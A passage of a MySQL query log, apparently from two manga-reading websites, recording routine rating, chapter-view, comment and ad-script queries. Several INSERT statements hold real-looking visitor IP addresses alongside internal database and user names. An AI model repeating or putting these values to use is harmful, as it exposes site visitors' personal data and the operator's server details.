manga_id = '306' order by created desc 330654083 Quit 330654084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330654084 Quit 330654085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330654085 Quit 330654086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330654086 Quit 330654087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330654087 Quit 330654088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330654088 Quit 330654089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330654089 Quit 330654090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330654090 Quit 330654091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330654091 Quit 330654092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330654092 Quit 330654093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330654093 Quit 330654094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330654094 Quit 330654095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330654095 Quit 330654096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330654096 Quit 330654097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330654097 Quit 330654098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330654098 Quit 330654099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330654099 Quit 330654100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330654100 Quit 330654101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330654101 Quit 330654102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330654102 Quit 330654103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330654103 Quit 330654104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330654104 Quit 330654105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330654105 Quit 330654106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330654106 Quit 330654107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330654107 Quit 330654108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330654108 Quit 330654109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330654109 Quit 330654110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330654110 Quit 330654111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330654111 Quit 330654112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330654112 Quit 330654113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330654113 Quit 330654114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330654114 Quit 330654115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330654115 Quit 330654116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330654116 Quit 330654117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330654117 Quit 330654118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330654118 Quit 330654119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330654119 Quit 330654120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330654120 Quit 330654121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330654121 Quit 330654122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330654122 Quit 330654123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330654123 Quit 330654124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330654124 Quit 330654125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330654125 Quit 330654126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330654126 Quit 330654127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330654127 Quit 330654128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330654128 Quit 330654129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330654129 Quit 330654130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330654130 Quit 330654131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330654131 Quit 330654132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330654132 Quit 330654133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330654133 Quit 330654134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330654134 Quit 330654135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330654135 Quit 330654136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330654136 Quit 330654137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330654137 Quit 330654138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330654138 Quit 330654139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330654139 Quit 330654140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330654140 Quit 330654141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330654141 Quit 330654142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330654142 Quit 330654143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330654143 Quit 330654144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330654144 Quit 330654145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330654145 Quit 330654146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330654146 Quit 330654147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330654147 Quit 330654148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330654148 Quit 330654149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330654149 Quit 330654150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330654150 Quit 330654151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330654151 Quit 330654152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330654152 Quit 330654153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330654153 Quit 330654154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330654154 Quit 330654155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330654155 Quit 330654156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330654156 Quit 330654157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330654157 Quit 330654158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330654158 Quit 330654159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330654159 Quit 330654160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330654160 Quit 330654161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330654161 Quit 330654162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654162 Quit 330654163 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654163 Quit 330654164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654164 Quit 330654165 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18459' 330654165 Quit 330654166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654166 Query select * FROM chapters where id = '18459' 330654166 Quit 330654167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654167 Query select * FROM chapters where manga_id = '384' order by id desc 330654167 Quit 330654168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654168 Query Update chapters set view=view+1 where id = '18459' 330654168 Quit 330654169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654169 Query select * FROM chapters where id = '18459' 330654169 Quit 330654170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654170 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18459' 330654170 Quit 330654171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654171 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('384', '18459', '2409:4085:d1d:94f9:68f0:f55a:1cea:148', 'mangacherri.com', '2026-02-26 03:29:29', '2026-02-26 03:29:29') 330654171 Quit 330654172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654172 Query select * FROM chapter_images where chapter_id = '18459' 330654172 Quit 330654173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654173 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '384' and m.active = 1 330654173 Quit 330654174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654174 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='384' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 260225 19:29:30 330654175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654175 Quit 330654176 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'my-life-turned-around-after-being-cheated-on-and-falsely-accused-i-ended-up-being-adored-by-the-most-beautiful-girl-in-school' 330654176 Quit 330654177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654177 Query select * FROM chapters where manga_id = '232' order by id desc 330654177 Quit 330654178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654178 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '232' and m.active = 1 330654178 Quit 330654179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654179 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='232' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Psychological%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Seinen%') ORDER BY RAND() limit 10 330654180 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654181 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654180 Quit 330654181 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '8043' and m.active = 1 330654181 Quit 330654182 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654182 Query select * FROM chapters where id = '8043' 330654182 Quit 330654183 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654183 Query select * FROM chapters where manga_id = '27' order by display_priority ASC, id desc 330654183 Quit 330654184 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654184 Query Update chapters set view=view+1 where id = '8043' 330654184 Quit 330654185 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654185 Query select * FROM chapters where id = '8043' 330654186 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654185 Quit 330654186 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '8043' and m.active = 1 330654186 Quit 330654187 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654187 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('27', '8043', '12.74.222.7', 'mangaberri.com', '2026-02-26 03:29:30', '2026-02-26 03:29:30') 330654174 Quit 330654187 Quit 330654188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654189 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654189 Query select * FROM chapter_images where chapter_id = '8043' 330654190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654188 Quit 330654190 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654190 Quit 330654189 Quit 330654191 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654191 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '27' and m.active = 1 330654191 Quit 330654192 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654192 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='27' and m.active = 1 AND (genres like '%Action%' OR genres like '%Martial Arts%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330654193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654193 Quit 330654194 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654194 Quit 330654195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654192 Quit 330654196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654195 Quit 330654196 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654196 Quit 330654197 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654199 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654197 Quit 330654199 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654198 Quit 330654199 Quit 330654200 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654200 Quit 330654201 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654202 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654201 Quit 330654202 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654202 Quit 330654203 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654204 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654204 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654204 Quit 330654205 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654203 Quit 330654206 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654205 Quit 330654206 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654206 Quit 330654207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654207 Quit 330654208 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4791' 330654208 Quit 330654209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654209 Query select * FROM chapters where id = '4791' 330654209 Quit 330654210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654210 Query select * FROM chapters where manga_id = '97' order by id desc 330654210 Quit 330654211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654211 Query Update chapters set view=view+1 where id = '4791' 330654211 Quit 330654212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654212 Query select * FROM chapters where id = '4791' 330654212 Quit 330654213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654213 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4791' 330654213 Quit 330654214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654214 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('97', '4791', '106.219.121.39', 'mangacherri.com', '2026-02-26 03:29:30', '2026-02-26 03:29:30') 330654214 Quit 330654215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654215 Query select * FROM chapter_images where chapter_id = '4791' 330654215 Quit 330654216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654216 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '97' and m.active = 1 330654216 Quit 330654217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654217 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='97' and m.active = 1 AND (genres like '%Music%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330654179 Quit 330654218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654218 Query select * FROM comments where manga_id = '232' and parent_id is null order by created desc 330654218 Quit 330654219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654219 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '232' and m.active = 1 330654219 Quit 330654220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654220 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Drama%' OR m.genres like '%Psychological%' OR m.genres like '%Romance%' OR m.genres like '%School%' OR m.genres like '%Seinen%') group by manga_id ORDER BY sum(view) DESC 330654220 Quit 330654221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654221 Quit 330654222 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654222 Quit 330654223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330654223 Quit 330654224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654224 Query select * FROM chapters where manga_id = '232' order by created desc limit 1 330654224 Quit 330654225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654225 Query select * FROM comments where parent_id = '1207' 330654225 Quit 330654226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654226 Query select * FROM comments where parent_id = '1010' 330654226 Quit 330654227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654227 Query select * FROM comments where parent_id = '956' 330654227 Quit 330654228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654228 Query select * FROM comments where parent_id = '920' 330654228 Quit 330654229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654229 Query select * FROM comments where parent_id = '889' 330654229 Quit 330654230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654230 Query select * FROM comments where parent_id = '855' 330654230 Quit 330654231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654231 Query select * FROM comments where parent_id = '840' 330654231 Quit 330654232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654232 Query select * FROM comments where parent_id = '808' 330654232 Quit 330654233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654233 Query select * FROM comments where parent_id = '809' 330654233 Quit 330654234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654234 Query select * FROM comments where parent_id = '810' 330654234 Quit 330654235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654235 Query select * FROM comments where parent_id = '811' 330654235 Quit 330654236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654236 Query select * FROM comments where parent_id = '812' 330654236 Quit 330654237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654237 Query select * FROM comments where parent_id = '813' 330654237 Quit 330654238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654238 Query select * FROM comments where parent_id = '774' 330654238 Quit 330654239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330654239 Quit 330654240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330654240 Quit 330654241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654241 Query select count(id) as 